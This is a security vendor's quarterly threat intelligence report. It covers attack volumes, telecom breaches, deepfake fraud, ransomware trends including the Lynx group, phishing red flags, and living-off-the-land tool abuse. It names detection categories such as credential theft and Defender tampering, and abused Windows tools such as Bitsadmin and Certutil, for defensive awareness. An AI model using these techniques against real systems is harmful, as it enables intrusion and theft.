Global Threat Intelligence Report

January 2025 Edition

Reporting Period: July 1 – September 30, 2024

Actionable Intelligence That Matters

This report provides a comprehensive review of the global threat landscape, with a focus on providing actionable intelligence that leaders can use to proactively secure their organizations. This report covers July through September 2024.

BlackBerry® cybersecurity solutions blocked nearly one million attacks against U.S. customers, identifying 80,000 unique malicious signatures and preventing 430,000 targeted attacks against commercial enterprises.

Read Cyberattacks Across the Globe for more information.

This quarter, of the 600,000 critical infrastructure attacks detected this quarter, 45% targeted financial institutions.

Uncover our Cyber Threat Intelligence (CTI) team’s internal and external findings in the Critical Infrastructure section.

PowerShell-based attacks demonstrate threat actors' regional adaptation while maintaining consistent global techniques across NALA, APAC and EMEA.

Read how our MDR Team Analysis reveals evolving regional attack patterns and the global persistence of PowerShell-based threats.

The Law Enforcement Limelight section reveals ransomware's evolution toward targeted psychological warfare including increasingly weaponized exfiltrated data for reputation damage and strategic leverage rather than just financial gain.

Read more on the ransomware epidemic targeting Canada.

 

RansomHub now hosts major affiliates including LockBit and ALPHV, accounting for the majority of ransomware operations detected in Q3 2024.

Read more under Threat Actors and Tooling.

New ransomware group Lynx employs aggressive double-extortion tactics (combining data theft with encryption) and is expanding from North America and Australia into European markets.

Read our Prevalent Threats section to learn about trending threats across all major operating systems.

We provide a list of enhanced security protocols and countermeasures to address evolving ransomware tactics, with emphasis on exposure reduction and communication security.

View the list in the Risk Mitigation Strategies.

Find detailed mitigation strategies in response to Salt Typhoon breaches, focusing on critical communications infrastructure protection.

Explore defense strategies for protecting critical communications infrastructure.

Table of Contents

The BlackBerry® Global Threat Intelligence Report provides critical insights for CISOs and decision-makers, focusing on the most recent cybersecurity threats and challenges relevant to their specific industries and regions.

In 2024, numerous factors shaped the cybersecurity threat landscape. Key elections worldwide, ongoing conflicts and geopolitical tensions over various contentious issues created a volatile environment. This turmoil has empowered malicious actors and cyberthreat groups globally. These entities exploit uncertainty and unrest to gain financial profit, conduct cyberespionage, cause harm or amplify chaos.

Cyberattacks Across the Globe

BlackBerry's AI-Driven Cybersecurity Performance

During the three-month period from July to September 2024, BlackBerry's AI-driven cybersecurity solutions protected a wide variety of clients across the globe. Our security technology thwarted nearly two million cyberattacks and recorded over 3,000 unique malicious hashes daily targeting our customers.

The United States faced the highest volume of cyberattacks this quarter, far more so than any other country. BlackBerry’s cybersecurity technology blocked nearly one million attacks against U.S. customers, with approximately 80,000 involving the use of unique malicious hashes.

BlackBerry tracks the number of unique malicious hashes used in these attacks, compared to the total number of attacks. Often, commodity or "off-the-shelf" malware is reused in larger-scale attacks, leading to the same binary being identified multiple times.

Unique or novel malware is typically employed in highly targeted attacks. Here, threat actors invest considerable time and effort to create new malware with specific attributes, aiming to compromise a particular industry, organization or high-value target (HVT) through apparently small yet ultimately impactful attacks.BlackBerry customers in the North America and Latin America (NALA) region logged the highest number of attempted attacks (i.e., attacks stopped by BlackBerry's cybersecurity solutions) and the greatest number of unique hashes. APAC (Asia and Pacific) ranked second and EMEA (Europe, Middle East, Africa) ranked third.

Figure 1: Attacks Stopped vs. Unique Hashes per region July - September 2024.
Figure 1: Attacks Stopped vs. Unique Hashes per region July - September 2024.

During this reporting period, the BlackBerry Managed Detection and Response (MDR) team's analysis revealed distinct regional patterns in threat activity. PowerShell-based attacks emerged as a consistent global threat, with Base64 encoded execution appearing in the top five detections across all regions — ranking first in NALA, fifth in APAC and third in EMEA.

Each region also showed unique threat characteristics:

  • NALA saw high volumes of system tool abuse, with renamed Sysinternals tools and LOLBAS (Living Off the Land Binaries and Scripts) shells among top concerns.
  • APAC faced significant credential theft attempts and defense evasion, targeting Windows Defender in particular.
  • EMEA showed diverse attack patterns, from PowerShell download commands to user account manipulation.

This regional variance in cyberattack patterns suggests threat actors are tailoring their approaches based on regional factors, while maintaining some consistent techniques globally.

Figure 2: Top five CylanceMDR alerts by region.

NALA

1st: Suspicious Base64 encoded PowerShell execution
2nd: Possible renamed Sysinternals tool was run
3rd: Services launched a LOLBAS shell
4th: Execution of remote access tools
5th: PowerShell download command execution

APAC

1st: Possible Windows credential theft
2nd: Svchost schedule task launches Rundll32
3rd: Windows Defender tampering via PowerShell
4th: Possible Msiexec abuse via DLL load
5th: Suspicious Base64 encoded PowerShell execution

EMEA

1st: PowerShell download command execution
2nd: Possible stdout command line abuse
3rd: Suspicious Base64 encoded PowerShell execution
4th: User account creation via Net Local Group Add
5th: Svchost schedule task launches Rundll32

Geopolitical Analysis and Comments

It has been more than a decade since Leon Panetta, then the U.S. Secretary of Defense, warned of a potential “Cyber Pearl Harbor,” highlighting the prospect of a crippling cyberattack on U.S. critical infrastructure that would cascade across the cyber-physical world. While his dire warning has not yet materialized, our reliance on digital technologies that are vulnerable to attack, exploitation and manipulation has grown. Some have characterized the predicament that our digitized societies face as a “devilish bargain” that has compromised security for the sake of economic growth, increased productivity and convenience.

Ten years ago, there were only a handful of mainly state actors capable of carrying out sophisticated cyberattacks. Today, there are hundreds of state and non-state actors. The latest National Cyber Threat Assessment from the Canadian government, along with cyberthreat assessments from other allied countries such as the UK, characterize the state of cyber insecurity as increasingly unpredictable with a growing cast of aggressive threat actors that are adopting new technologies and tactics to improve and amplify their malicious activities.

The impact of this proliferation is pervasive. According to the Global Anti-Scam Alliance, an estimated 25.5% of the world’s population was impacted by cyber-enabled fraud in 2023. In the UK, more than 70% of medium and large businesses and nearly 66% of high-income charities have experienced some form of cybersecurity breach. In Canada, more than two-thirds (70%) of Canadians experienced a cybersecurity incident in the past year. BlackBerry’s own analysis confirms these trends and highlights the increase in cyberattacks against critical infrastructure.

Ransomware is widely regarded as the most disruptive form of cybercrime and there is a growing fear that “ransomware could cripple countries, not just companies.” In fact, ransomware attacks on critical infrastructure, such as the healthcare sector, are up significantly. In the United States, the Department of Health and Human Services reported a 278% increase in large data breaches involving ransomware at hospitals between 2018 and 2022. And, as the number of ransomware attacks proliferates, so do the variety of tactics and techniques used by ransomware actors. Ransomware groups now employ multifaceted extortion strategies that involve the exfiltration and encryption of victim data while also maintaining data leak sites on the dark web where stolen data from non-compliant victims is posted. The web of criminality is becoming increasingly complex.

The challenge is not just technical. The alarming reality is that cybercrime operations are having a negative impact on human welfare. Researchers have documented a 35% to 41% increase in in-hospital mortality in the wake of a ransomware attack on a hospital. Other studies have highlighted how ransomware attacks have a cascading effect on adjacent emergency departments, causing significant operational disruption and negatively impacting ambulance arrivals, treatment waiting times and patient care.

Another alarming trend has been the emergence of a cybercrime-related human trafficking industry. The United Nations has documented approximately 220,000 people trafficked into cybercrime operations in Southeast Asia in 2023. These individuals face threats to their lives and are subjected to torture and cruel, inhumane and degrading treatment or punishment, arbitrary detention, sexual violence, forced labor and other forms of exploitation. Organized crime groups have been running such operations out of Cambodia for more than a decade and have since expanded to other countries such as Myanmar, Thailand, Laos and the Philippines. In some cases, people are trafficked to these forced cybercrime operation sites in Southeast Asia from as far away as Brazil and East Africa.

As cyberthreats proliferate, governments and industry are working hard to disrupt the ransomware ecosystem and strengthen our collective ability to deter malicious cyber actors. In October 2024, BlackBerry and Public Safety Canada agreed to co-chair the Public-Private Sector Advisory Panel of the International Counter Ransomware Initiative (CRI). Along with the 68 member states of the CRI, BlackBerry works to strengthen collective resilience against ransomware and better equip governments around the world to counter the menace of ransomware and other cyber-related threats.

Figure 3: Distribution of attacks and unique hashes across critical infrastructure and commercial enterprise, April - June 2024 vs. July - September 2024.

Cyberattack Landscape by Industry

Shifting from a global perspective to an industry-specific focus, BlackBerry analysts identified the primary targets of threat actors. For the purposes of this report, industry sectors are consolidated into two major categories: critical infrastructure and commercial enterprises.

BlackBerry gathers telemetry and statistics on critical infrastructure customers across the 16 industry sectors defined by the Cybersecurity and Infrastructure Security Agency (CISA). These include healthcare, government, energy, finance and defense. Commercial enterprises are those that engage in the production, distribution or sale of goods and services. These enterprises operate in various sectors such as manufacturing, retail and services. Figure 3 below shows the distribution of attacks and unique hashes across critical infrastructure and commercial enterprise.

Figure 3: Distribution of attacks and unique hashes across critical infrastructure and commercial enterprise, April - June 2024 vs. July - September 2024.

Critical Infrastructure Threats

Critical infrastructure can be a potentially lucrative target for cybercriminals. The valuable data held by these industries is often sold on underground markets, used for planning future attacks or leveraged for espionage. There has been a recent surge in attacks focused on critical infrastructure sectors such as healthcare, energy, finance and defense. For organizations in these sectors, downtime is costly. They are more likely to pay a ransom to restore systems quickly due to the potential losses that they and their customers might incur from downtime and lack of access to critical data.

With more services being digitized and more systems than ever before being connected to the Internet, organizations in these sectors often find themselves in the crosshairs of cybercriminals. These criminal groups range from novice hackers seeking peer recognition to organized nation-state threat actors and established ransomware groups seeking to inflict chaos on their enemies. The impact of these attacks can be devastating, affecting national security and disrupting essential operations as well as risking both economic stability and even human lives.

BlackBerry cybersecurity solutions, including CylanceENDPOINT™, thwarted nearly 600,000 attacks on critical infrastructure this quarter, with 45% of these attacks targeting the financial sector. Finance continues to be a popular target for cyberattackers.

Figure 4: Breakdown of attacks and unique hashes by critical infrastructure sectors.
Figure 4: Breakdown of attacks and unique hashes by critical infrastructure sectors.
In this next section, we’ll take a closer look at some of the most prevalent threats to critical infrastructure that we’ve encountered this quarter. The first part lists the types of threats that BlackBerry most commonly identifies and guards against within its customer base. The second part covers threats reported by third parties, such as industry news publications, security vendors or government agencies.
Figure 5: Distribution of BlackBerry internal threats across critical infrastructure this quarter.

Commercial Enterprise Threats

The commercial enterprise industry, spanning sectors like capital goods, retail and wholesale trade, is a prime target for sophisticated cyberattacks. Successful breaches may lead to compromised networks, data loss, operational disruptions, reputational harm and significant financial costs.

This quarter, BlackBerry cybersecurity solutions stopped over 430,000 targeted attacks against commercial enterprise businesses. The chart below illustrates the industries that received the largest volume of attempted attacks and unique malware hashes.

Figure 6: Distribution of blocked attacks and unique hashes in commercial enterprise industries.
Figure 6: Distribution of blocked attacks and unique hashes in commercial enterprise industries.
Figure 7: Top internal threats against commercial enterprise from July to September 2024.
Figure 7: Top internal threats against commercial enterprise from July to September 2024.

Communications Security: Threats and Mitigations

Due to its near-universal use, modern telecommunications infrastructure now faces an unprecedented array of sophisticated threats targeting its fundamental operations and data flows. From nation-state actors conducting large-scale espionage to cybercriminal enterprises offering "interception-as-a-service," these threats exploit the inherent trade-offs between global connectivity and security in each nation’s public telecom networks.

As organizations increasingly rely on mobile and digital communications for sensitive operations, the security gaps in these networks have become critical vulnerabilities that could potentially expose competitive advantages, strategic plans and confidential information. The recent cascade of telecom provider breaches demonstrates that no organization can assume their communications are secure simply because they're using standard carrier services.

Earlier this quarter, AT&T disclosed a major security breach in which threat actors compromised the call and text records of their cellular customers over an extended period; we now know that multiple telecom organizations were infiltrated. Some U.S. leaders called it “the worst telecom breach in our nation’s history.” The AT&T breach was highly significant because it impacted not only AT&T subscribers, but also anyone worldwide who had communicated with an AT&T customer during the affected period. The compromised data included potentially valuable metadata about communication patterns, timing of calls and relationships between users.

In this section, we will explore the various types of entities that are threatening communications infrastructure, the tactics they use and mitigations that organizations can take to protect their data.

 

Threat Actors

Nation-state actors represent a significant threat to international telecommunications security, as evidenced by recent events in which Chinese government-linked attackers conducted a sweeping cyber-espionage campaign. These sophisticated actors targeted major telecom companies to access mobile phone data of prominent figures, including U.S. presidential candidates.

U.S. government officials believe a threat actor known as Salt Typhoon, closely linked to China's Ministry of State Security, is the culprit behind the telecommunications infiltration campaign. Their operations affected multiple major carriers including Verizon, AT&T and T-Mobile, with investigators discovering they had remained undetected in these networks for over a year.

Criminal entities have evolved over time to provide highly specialized attack services within the telecommunications sector. These include organizations that offer "call-interception-as-a-service" and operate "wire-tapping-as-a-service" platforms with services readily available for purchase on the Internet. Some threat actors have developed capabilities to redirect and intercept cellular connections for any phone number without the end user's awareness.

The telecommunications sector also faces threats from adversaries seeking to gain advantages through communications exploitation. These actors target high-profile individuals and organizations using intercepted data for blackmail attempts or to expose confidential relationships to undermine public trust in the targeted individual. Of particular concern is their ability to identify and potentially expose high-profile supporters of political candidates who are attempting to remain out of public view or individuals whose physical safety relies on their anonymity, such as journalists, reporters and political activists.

Identified Threats

The inherent vulnerabilities in telecommunications networks can potentially expose organizations to a complex web of interconnected threats. While public telecom networks excel at providing global reachability, this accessibility comes with security trade-offs that malicious actors can (and often do) exploit.

From direct communication interception to sophisticated metadata analysis, these threats target not just the content of communications but also the patterns and relationships they reveal. Recent breaches of major telecom providers have demonstrated that these threats are not merely theoretical but represent active risks to employer-employee confidentiality, competitive advantage and even national security. Some of these risks include:

Communication Interception: Threat actors can intercept both audio/video calls and SMS messages, allowing them to eavesdrop on communications in real-time. Many of the risks these vulnerabilities present to standard telephony also exist in the free apps used for voice calls and messaging.

Metadata Exploitation: With metadata exploitation, threat actors collect and analyze both call detail records (CDR) and message detail records (MDR). This data enables them to construct detailed maps of contact relationships and analyze communication patterns including frequency, time of day and call duration. Real-time visibility into this metadata allows threat actors to track the subscribers of individual telecoms and identify exploitable communication patterns.

Vice President of BlackBerry Threat Research and Intelligence Ismael Valenzuela explains, “Telecommunications metadata can be a goldmine for cybercriminals. Even if the contents of calls and texts aren’t leaked, knowledge of the context behind these calls, such as who a person calls, how often and when, can be easily weaponized. Threat actors can figure out approximately where you live, where you work, who you talk to most often and even if you call any potentially sensitive numbers, such as healthcare providers.”

Identity-Based Attacks: The lack of identity validation in public networks makes identity and phone number spoofing endemic and almost impossible to prevent. Threat actors can use stolen metadata to specifically target telecom subscribers by spoofing numbers they have already been communicating with. Those who pick up will most likely be subjected to robo-calls, but in some cases attackers may use new technologies such as deep-voice generators to engineer complex identity scams.

Cloning the voice of a real person using generative AI is known as an audio deepfake. These types of attacks are rapidly gaining momentum in the corporate world as attackers quite literally rely on employees trusting the voice of someone they know — such as their boss — and abuse this trust to perpetuate high-dollar financial scams.

Infrastructure Vulnerabilities: The modern telecommunications infrastructure contains particularly difficult challenges. Fixes often require wholesale replacement of system components, which can cause service disruptions and require significant investment from telecommunications providers.

  • Legacy System Components: Critical parts of the telecommunications backbone still run on systems from the 1970s and 1980s that predate modern cybersecurity protections and were designed primarily for landline operations. To upgrade these aging components to align with current security measures, they would need to be strengthened by routing communications through secure relay networks and implementing end-to-end encryption that safeguards both the data content and its transmission patterns.
  • Network Access Points: The carrier-interconnect cellular-roaming protocols contain inherent weaknesses that allow malicious actors to redirect and intercept cellular connections. This vulnerability exists across all major carriers including AT&T, Verizon and T-Mobile, as demonstrated by Salt Typhoon's successful exploitation of network nodes across multiple providers.
  • Authentication Systems: Basic security controls like multi-factor authentication are notably absent in some critical telecommunications infrastructure components. This gap allows threat actors to maintain persistent access once they've gained initial entry.
  • Monitoring Systems: The "lawful intercept" infrastructure, designed for legal surveillance operations, can be compromised to reveal sensitive operational data about ongoing investigations and surveillance targets.
  • Data Transit Points: The interconnections between Internet service providers and telecommunications networks create additional vulnerability points where unencrypted email and other communications can be intercepted.
  • Global Routing Infrastructure: The fundamental design of telecommunications networks prioritizes global connectivity over security, creating inherent vulnerabilities in how calls and data are routed between providers and across regions.

Intelligence Gathering: Telecommunications breaches greatly assist threat actors in their intelligence gathering capabilities. Threat actors can use leaked information to conduct real-time surveillance of specific subscribers and, in some cases, identify hidden relationships. In the context of political campaigns, this surveillance enables them to discover high-profile supporters attempting to maintain privacy and expose confidential connections. This intelligence can reveal additional communication patterns that may also be exploited in unexpected ways.

“You may feel you have nothing an attacker could want,” adds Valenzuela, “but just knowing who you call most regularly and who you’d be most likely to trust and therefore pick up a call from makes it easier for cybercriminals to perpetuate any one of a multitude of phone-based scams, including those that rely on deepfake audio to spoof the voice of a person you know.”

Secondary Threats: The exploitation of telecommunications vulnerabilities can lead to secondary threats. These include blackmail attempts, particularly when confidential relationships are exposed. Additionally, the compromised information can be used for competitive intelligence gathering and espionage. If a high-profile person, entity or organization is compromised, this may even impact democratic processes and threaten national security.

According to David Wiseman, Vice President of BlackBerry SecuSUITE®, "Secrets that provide competitive advantages — whether in the marketplace or on the battlefield — are vulnerable to exposure. Public telecom networks are primarily designed for accessibility, which often leads to security compromises."

A significant issue with public networks including encrypted messaging platforms is their open nature, allowing virtually anyone to join. Wiseman explains, "On platforms like Signal or WhatsApp, users self-register which contributes to problems such as identity spoofing, fraud and concerns over deepfakes. Open systems with self-registration are inherently high-risk."

Mitigations

To counter the evolving landscape of telecommunications threats, organizations must implement comprehensive security measures that go beyond basic encryption. While consumer-grade communication tools offer some measure of protection, they fall short of addressing sophisticated attacks targeting both message content and metadata.

Effective defense requires a multi-layered approach that combines technological solutions with strategic protocols and human vigilance. The following strategies provide a framework for organizations to protect their sensitive communications from nation-state actors, criminal entities and other threat actors seeking to exploit telecommunications vulnerabilities.

Authentication and Identity Verification: Multi-factor authentication (MFA) and identity verification protocols serve as critical first-line defenses against unauthorized access and social engineering attacks.

  • Tactic: Implement robust authentication systems while training users to verify unexpected communications through alternative or secondary channels.
  • Example: When an executive receives an urgent message from a board member outside normal hours making an unusual request, they follow protocol by verifying through a separate pre-established communication channel.

Link and Message Security: Social engineering attacks exploit trust in familiar phone numbers and message sources to distribute malicious content.

  • Tactic: Establish strict protocols for link handling and implement systems that scan and verify message content before delivery.
  • Example: A banking institution implements a no-click policy on external links, requiring all important communications to occur within their own secure platform.

Infrastructure Control: Organizations need complete oversight of their communication channels to prevent unauthorized access and maintain security standards.

  • Tactic: Deploy communication systems where the organization maintains full control over infrastructure, user authorization and security protocols.
  • Example: A defense contractor implements a closed-loop communication system where all users must be pre-authorized and all communications are routed through monitored, secure channels.

Metadata Protection: Communication patterns and metadata can reveal sensitive information, even when message content is secure.

  • Tactic: Encrypt and tunnel all metadata including caller information, communication duration and relationship patterns between users.
  • Example: A financial institution prevents competitors from mapping their merger discussions by encrypting not just the communications but also the patterns of which executives are communicating with each other.

Mobile Security Enhancement: Mobile communications present unique security challenges requiring specialized cryptographic solutions.

  • Tactic: Implement certified cryptographic authentications for all mobile communications to prevent call spoofing, fraud and unauthorized access.
  • Example: A government agency deploys mobile devices with built-in cryptographic authentication, ensuring all communications are verified and secure regardless of location.

Data Lifecycle Control: Traditional communication systems relinquish control of data once shared, creating permanent security vulnerabilities.

  • Tactic: Maintain organizational ownership of all shared data with the ability to revoke access or delete content at any time.
  • Example: When an executive leaves a Fortune 100 company, the organization immediately revokes access to all previously shared documents and communications.

Social Engineering Defense: Basic human behavior often presents the greatest security vulnerability in communication systems.

  • Tactic: Implement comprehensive training programs supported by automated systems to detect and prevent social engineering attempts.
  • Example: An organization's secure communication platform automatically flags and requires additional verification for any unusual communication patterns or requests.

Risk Assessment Integration: Security measures must be tailored to specific organizational risks and regulatory requirements.

  • Tactic: Regularly assess communication security risks and adjust protocols based on emerging threats and compliance needs.
  • Example: A healthcare provider conducts quarterly assessments of their communication security measures, updating protocols based on new threat intelligence and regulatory changes.

Holistic Security Integration: Communication security must be integrated into a broader cybersecurity strategy.

  • Tactic: Ensure secure communications work in concert with other security measures and protocols.
  • Example: A manufacturing firm integrates their secure communication platform with their access control and data loss prevention systems, creating a unified security ecosystem.

Temporary Data Architecture: Persistent data storage increases vulnerability to breaches and unauthorized access.

  • Tactic: Implement systems that minimize data persistence through temporary storage and automatic purging protocols.
  • Example: A legal firm's communication platform automatically deletes messages from servers immediately after confirmed delivery to all authorized recipients.

Read our blog to learn more about how threat actors use and abuse stolen metadata from mobile communications.

The Dangers of Deepfakes

The FBI recently released a warning about cybercriminals using generative AI to commit large-scale fraud, targeting commercial enterprise and financial organizations with elaborate scams. The advisory warns about the ramifications of deepfake videos and voice calls, as well as AI-generated profile images to impersonate people that may be used in hiring scams, such as the North Korean campaign to infiltrate Western IT companies with spies posing as remote workers.

This newly expanded cyberattack surface is a very real threat to commercial enterprises of all sizes, with losses projected to reach a staggering $40 billion by 2027. As BlackBerry's Senior VP of Product Engineering and Data Science, Shiladitya Sircar, recently explained in an episode of Daniel Miessler's Unsupervised Learning podcast, "This type of generative AI adversary creates new attack vectors with all of this multimodal information that no one sees coming. It creates a more complex, nuanced threat landscape that prioritizes identity-driven attacks, and it'll only get better."

The implications for business are profound. When stakeholders can no longer trust the authenticity of executive communications, every aspect of operations is affected — from market-moving announcements to internal strategic directives. The banking and financial services sector has emerged as the primary target, facing unprecedented challenges in maintaining secure communications and transaction verification processes. As Sircar notes, "The most concerning aspect of these deepfakes is the potential for eroding trust — trust in systems that are legitimate, that are true."

Forward-thinking organizations are already positioning themselves ahead of emerging regulatory requirements, including the U.S. No AI Fraud Act and Canadian legislation on non-consensual media. These regulatory developments signal a crucial shift in how businesses must approach communication security and identity verification.

As deep-voice and generative AI voice alteration software improves, it's likely these tools will be used more frequently in a growing number of targeted attacks. If you'd like to learn more about deepfakes, including mitigations you can use to help protect your organization, you can download our white paper on deepfakes here, or listen to our full discussion with Shiladitya Sircar on the Unsupervised Learning podcast.

If you believe you’ve been a victim of a deepfake fraud scheme, you can file a report with the FBI's Internet Crime Complaint Center at www.ic3.gov.

Law Enforcement Limelight

BlackBerry works with law enforcement agencies around the world to improve public-private collaboration on cybersecurity. Beginning with the September 2024 Global Threat Intelligence Report, BlackBerry has begun collaborating with the Royal Canadian Mounted Police’s National Cybercrime Coordination Centre (NC3) to share intelligence. The following information has been provided by the NC3 to highlight cybercrime trends from a law enforcement perspective.
Law Enforcement Limelight

Historical Background: The Rise of Ransomware Groups

The ransomware ecosystem has evolved significantly since the first recorded attack in 1989, when the AIDS trojan horse was released. Ransomware evolution was gradual prior to the emergence of cryptocurrency in 2010. The Bitcoin era, however, has spurred rapid growth in cyberthreats, especially over the last half decade.

In 2019, groups such as MAZE, Ryuk and Sodinokibi/REvil were wreaking havoc by encrypting computer systems and networks and demanding payments for decryption keys. This was an effective attack strategy at the time because few organizations maintained system backups and still fewer had cyber incident response plans.

 

The Ever-Evolving Ransomware Threat

During this time, ransomware operations were viewed much like traditional organized crime groups: skilled cybercriminals coming together for a common cause or purpose. Since then, ransomware groups have become very adaptive adversaries and, as cybersecurity practices have improved, so have the tactics, techniques and procedures (TTPs) of ransomware operators.

To ensure financial gain, ransomware groups moved from single extortion (data encryption only) to double extortion tactics, demanding ransom payments for the decryption key and additionally to keep stolen data from being sold on the dark web.

The number of ransomware operations has also steadily increased, with old groups rebranding, new groups entering the ecosystem and new business models emerging. Ransomware-as-a-Service (RaaS), as well as faster encryption methods, better obfuscation techniques and the ability to target multiple operating systems, are some of the notable advancements over the past few years.

While some ransomware operations continue to encrypt files and systems, others have chosen to forego this step and move to an exfiltration-only model. This change in approach is likely a response to the adoption of better cybersecurity practices and the increased use of system backups and disaster recovery services.

A Third Element of Extortion

More recently, ransomware operations have added a third element of extortion. As opposed to only exfiltrating data and threatening to post it online, some ransomware operations are taking the time to analyze stolen data and weaponize it to increase pressure on victims who refuse to pay. This strategy may involve sharing the contact details or doxing the family members of targeted CEOs and business owners, as well as threatening to report any information about illegal business activities uncovered in the stolen data to the authorities. The ransomware operators may threaten to contact customers or clients, or worse, launch additional attacks if ransom demands are not met.

In addition, the NC3 has seen a considerable number of new ransomware variants emerge. The ransomware ecosystem appears to comprise heterogeneous groups of individuals with skillsets ranging from social engineering, initial access brokering, advanced encryption, malware development, negotiation and even public relations. The ransomware ecosystem is a complicated interconnected network. Combating ransomware operations requires an equally complex, multi-disciplinary approach.

Law Enforcement Challenges

For law enforcement, the continued evolution in the ransomware space represents a considerable challenge that requires innovative solutions. Ransomware is a top global threat, and it is likely to persist as long as victims continue to pay.

From prior law enforcement crackdowns on high-profile ransomware groups such as Hive, BlackCat and LockBit, we know that ransomware actors can quickly adapt their tactics to thwart law enforcement efforts. These adaptive efforts have fragmented the ransomware ecosystem, forcing law enforcement to adopt multifaceted strategies that include creative methods for disrupting operations (e.g., targeting infrastructure, reputation and trust).

Top 10 Canadian Ransomware Threats

The NC3 works closely with domestic and international law enforcement, government partners, private industry and academia to continuously improve the Canadian law enforcement response to cybercrime. In addition to contributing to and supporting specific cybercrime law enforcement operations, the National Cybercrime Coordination Centre routinely monitors the evolution of the cyberthreat landscape and conducts a tri-annual assessment of the ransomware operators targeting Canada. This systematic assessment informs the cybersecurity industry of changes in the cybercrime ecosystem as well as help direct investigative resources.

The table below tracks the most prevalent ransomware threats in Canada for the May through August 2024 reporting period, which overlaps with the period this report covers.

Figure 8: Canadian ransomware threats, May – August 2024.
Figure 8: Canadian ransomware threats, May – August 2024.

Emerging Group Spotlight – Lynx Ransomware

The Lynx ransomware group first appeared on the threat landscape in July 2024 and quickly accumulated more than 25 victims during the following months. Targeted organizations were split across a wide range of industries and located primarily across North America and Europe.

What is the Lynx Group?

The Lynx group, like many ransomware operators today, uses a double-extortion strategy. After unlawfully accessing a system or network, they first exfiltrate sensitive data before encrypting it, making it inaccessible to the owner. They then threaten to publicly release the data if the ransom isn't paid. When an organization is breached by Lynx, the group publishes a blog post on a leak site — accessible via the public Internet or the dark web, or sometimes both — “naming and shaming” the victim.

Figure 9: Screen capture of the Lynx dark web leak site.
Figure 9: Screen capture of the Lynx dark web leak site.
The stolen data may be further leveraged by the group in ransom negotiations, with the threat of more information being published if the victim fails to meet additional ransom demands.

Industries and Regions Targeted by Lynx

In the images below, you can see the areas and industries where Lynx is more prevalent. Lynx primarily targets North American and Australian organizations, but also the UK and parts of Europe
Industries and Regions Targeted by Lynx
Figure 10: Lynx’s geographic distribution of victims.
Figure 11: Key industries targeted by Lynx.

How Lynx Operates

Lynx maintains both a surface website and a deep web leak site along with a series of mirrored sites located at “.onion” addresses — presumably to ensure uptime should any of their sites be taken offline by law enforcement. They also employ their own encryptor which, upon closer examination by BlackBerry researchers, appears to have been developed from the same codebase as the one used by the infamous INC Ransom group.

To date, a handful of samples related to the encryptor utilized by the Lynx group have been identified in the wild. All samples appear to be written in C++ and lack any form of packing or obfuscation to impede analysis.

Once pre-encryption objectives such as gaining initial access and data exfiltration have been conducted, the ransomware is deployed on the victim's environment. The ransomware itself is designed to be executed via the command-line console, supporting several optional arguments. This enables an attacker to customize their approach for file-encryption to accomplish their goals.

Upon execution, the malware further supports a “--verbose” mode that will print a list of operations the ransomware is conducting as it is dynamically running.

How Lynx Operates
Figure 12: Lynx encryptor running in verbose mode.

To prevent a victim’s device from becoming inoperable, the malware omits certain file-types and Windows folders from encryption. This serves a dual-use purpose by speeding up encryption and preventing critical Windows programs becoming inaccessible which would “brick” the device and ruin the group’s chance at holding it to ransom.

For a more detailed analysis of this emerging threat, read our full report on Lynx.

Operational Security Measures

Regular security awareness training is vital in cultivating a vigilant organizational culture. Topics such as phishing prevention, credential security and remote access security should be emphasized.

  • Tactic: Implement a "Spot the Red Flag" training program in which employees receive simulated phishing emails containing common deceptive elements followed by immediate educational feedback explaining each suspicious indicator. Track employee response rates and provide targeted follow-up training based on individual performance metrics.
  • Example: An international retailer significantly reduces its phishing incidents by launching a comprehensive training program coupled with a robust patch management system to address vulnerabilities promptly.
  • It only takes one employee to click on a malicious link to compromise an organization’s systems and infrastructure. Here’s a sample phishing message to incorporate into your training.
Figure 13a: Typical connection request an employee might receive.
Figure 13a: Typical connection request an employee might receive.
However, a closer look reveals the typical traits of a phishing email (Figure 13b):
Figure 13b: Red flags to look out for in a phishing email.
Figure 13b: Red flags to look out for in a phishing email.
  1. The sender's email address claims to be from "linkedincdn.com" rather than the official LinkedIn.com domain — this is a classic domain spoofing technique.
  2. There's a warning banner indicating this is from an external source. This is a helpful security feature that many organizations choose to implement.
  3. The message uses two classic social engineering tactics. It claims to be from a high-level executive (CISO) at the target’s organization and uses flattery ("have heard great things about you") to encourage engagement.
  4. The copy contains inconsistent formatting: spelling and grammar irregularities can be found throughout.
  5. Although the profile photo makes it seem genuine, these can be easily copied off a legitimate profile by anyone who knows how to right click and select “Save Image As.”
  6. The email’s overall appearance mimics common automated messages emailed to users by social media sites.
    • The "Accept" and "View Profile" buttons are likely to be malicious links that could lead to credential harvesting pages or malware downloads.
    • The "Unsubscribe" link at the bottom may also be malicious. Phishers often include these to appear legitimate while actually leading users to more harmful content.

Help your employees learn to:

  • Verify sender email domains carefully.
  • Be suspicious of unsolicited connection requests, particularly from high-ranking executives.
  • Never click on buttons or links in suspicious emails — they should instead visit the referenced site by typing the URL directly into their browser.
  • Pay attention to security warnings from their email system.
  • Be wary of flattery or urgency in unexpected professional networking requests.

Cybercriminals continually refine their cyberattacks to enhance their impact. To defend against these evolving threats, organizations must adopt a forward-looking approach to cybersecurity defense strategies. That includes investing strategically in technologies — such as security monitoring, staff training and incident response — to ensure they are prepared for sophisticated cyberthreats.

Cyber Story Highlight: Coyote Banking Trojan Targets Latin America, Focuses on Brazilian Financial Institutions

In July 2024, BlackBerry researchers uncovered a campaign in which Coyote was deployed to target Brazilian banks and cryptocurrency exchanges. The rising trend of geo-targeted banking trojans stresses the need for robust cybersecurity and user education to combat phishing and social engineering threats like Coyote. In the Mitigations section of this report, you will find additional actionable security ideas to share within your organization.

CylanceMDR: Threats and Mitigations

Organizations face threats not only from threat actors’ malware, but also from the misuse of legitimate tools. This section highlights the most prevalent threats the CylanceMDR™ team has encountered in customer network environments this quarter, as well as mitigations that organizations can use to strengthen their cyber defenses.

CylanceMDR is our subscription-based MDR service that provides 24x7 monitoring and helps organizations stop sophisticated cyberthreats by filling gaps in security environments.

LOLBAS Activity

LOLBAS Activity

LOLBAS refers to built-in Windows system tools and legitimate executables that attackers can abuse for malicious purposes. The term "living off the land" means using tools that are already present in the target environment (“the land”), rather than risk introducing new malware that may trigger security systems and alert the target to the fact they’ve been compromised. The danger of LOLBAS-based attacks lies in their ability to bypass security controls since they use legitimate system tools. This makes detection challenging as system activities may appear normal at first glance.

During this reporting period, the following LOLBAS activity was observed:

  • Bitsadmin continues to be the most observed LOLBAS.
  • Certutil is the second most-observed, although its use has decreased since the last reporting period.
  • Regsvr32, MSHTA and PsExec have also been observed but make up a low percentage of overall activity.

